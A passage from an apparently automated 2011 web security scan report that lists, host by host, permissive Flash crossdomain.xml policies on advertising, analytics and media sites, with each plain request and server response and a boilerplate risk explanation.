Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:16:22 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.8. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 14 Jun 2011 17:45:46 GMT
Date: Mon, 13 Jun 2011 17:45:46 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.9. http://b.voicefive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 15 Jun 2011 00:16:56 GMT
Date: Tue, 14 Jun 2011 00:16:56 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.10. http://bs.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 14 Jun 2011 00:13:56 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


4.11. http://community.mtv.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.mtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: community.mtv.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 23 May 2011 08:23:53 GMT
Accept-Ranges: bytes
ETag: "a4283dc02219cc1:0"
Server: Microsoft-IIS/7.0
Server: w06w
App: ww
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
Content-Length: 183
Date: Tue, 14 Jun 2011 00:27:49 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.12. http://d3.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d3.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:34:56 GMT
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 248
Date: Tue, 14 Jun 2011 00:28:48 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.13. http://d7.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 247
Content-Type: application/xml
ETag: "1b42679-f7-44d91b52c0400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6860
Date: Tue, 14 Jun 2011 00:28:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.14. http://daapiak.flux.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://daapiak.flux.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: daapiak.flux.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 23 May 2011 08:22:37 GMT
Accept-Ranges: bytes
ETag: "cc124932219cc1:0"
Server: Microsoft-IIS/7.0
Server: w06g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 247
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:19:08 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from d
...[SNIP]...

4.15. http://ds.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Tue, 14 Jun 2011 00:13:57 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


4.16. http://en.gravatar.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: en.gravatar.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:30:09 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Accept-Ranges: bytes
Content-Length: 261

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.17. http://farm1.static.flickr.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://farm1.static.flickr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: farm1.static.flickr.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain
Content-Length: 265
Last-Modified: Thu, 07 Apr 2011 17:55:07 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...

4.18. http://farm2.static.flickr.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://farm2.static.flickr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: farm2.static.flickr.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain
Content-Length: 265
Last-Modified: Thu, 07 Apr 2011 17:16:19 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...

4.19. http://farm3.static.flickr.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://farm3.static.flickr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: farm3.static.flickr.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain
Content-Length: 265
Last-Modified: Thu, 07 Apr 2011 22:37:29 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...

4.20. http://farm4.static.flickr.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://farm4.static.flickr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: farm4.static.flickr.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain
Content-Length: 265
Last-Modified: Wed, 13 Apr 2011 15:31:30 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...

4.21. http://farm5.static.flickr.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://farm5.static.flickr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: farm5.static.flickr.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain
Content-Length: 265
Last-Modified: Wed, 13 Apr 2011 16:10:03 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...

4.22. http://farm6.static.flickr.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://farm6.static.flickr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: farm6.static.flickr.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain
Content-Length: 265
Last-Modified: Thu, 14 Apr 2011 04:15:28 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...

4.23. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 13 Jun 2011 20:44:07 GMT
Expires: Tue, 17 May 2011 18:17:24 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 12596
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.24. http://gs.mtv.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gs.mtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: gs.mtv.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 21 May 2008 22:04:19 GMT
ETag: "5febfdd-222-c7459ec0"
Accept-Ranges: bytes
Content-Length: 546
Content-Type: application/xml
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:19:46 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/
...[SNIP]...
<allow-access-from domain="*" />
<allow-access-from domain="*" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.mtvi.com" />
<allow-access-from domain="*.mtvi.com" to-ports="80,443,10000" />
...[SNIP]...

4.25. http://i0.poll.fm/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://i0.poll.fm
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: i0.poll.fm

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Tue, 14 Jun 2011 00:32:50 GMT
Last-Modified: Tue, 15 Jun 2010 12:42:06 GMT
Server: nginx
Content-Length: 214
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-
...[SNIP]...

4.26. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 15-Jun-2011 12:02:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 12-Sep-2011 12:02:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

4.27. http://imx.mtv.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://imx.mtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imx.mtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Tue, 15 Apr 2008 20:18:17 GMT
ETag: "4b5484c-117-44aef19c7b440"
Accept-Ranges: bytes
Content-Length: 279
Content-Type: application/xml
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:20:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
   <al
...[SNIP]...

4.28. http://js.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Tue, 14 Jun 2011 00:13:54 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.29. http://l.yimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.yimg.com

Response

HTTP/1.0 200 OK
Date: Mon, 13 Jun 2011 02:20:28 GMT
Cache-Control: max-age=315360000
Expires: Thu, 10 Jun 2021 02:20:28 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:55 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 79361
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.30. http://log30.doubleverify.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:30:12 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.31. http://m.webtrends.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.webtrends.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:762"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:34:17 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.32. http://m1.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://m1.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m1.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:08:32 GMT
ETag: "1b42679-f7-44d91b52c0400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 247
Date: Tue, 14 Jun 2011 00:29:11 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.33. http://mswindowswolglobal.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://mswindowswolglobal.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mswindowswolglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:34:25 GMT
Server: Omniture DC/2.0.0
xserver: www420
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.34. http://mtv.mtvnimages.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://mtv.mtvnimages.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mtv.mtvnimages.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
X-Powered-By: mtvnimages.com version 1.5.56 (r248708)
ETag: W/"203-1306441848000"
Last-Modified: Thu, 26 May 2011 20:30:48 GMT
Content-Length: 203
Content-Type: text/xml
Cache-Control: max-age=63882
Date: Tue, 14 Jun 2011 00:15:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.35. http://now.eloqua.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 14 Jun 2011 12:27:59 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.36. http://om.dowjoneson.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://om.dowjoneson.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: om.dowjoneson.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:13:57 GMT
Server: Omniture DC/2.0.0
xserver: www68
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.37. http://ping1.unicast.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ping1.unicast.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ping1.unicast.com

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 14:19:55 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache
content-type: application/xml
Via: 1.0 rhv192178010000 (MII-APC/1.6)
Content-Length: 1152
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.38. http://pix04.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

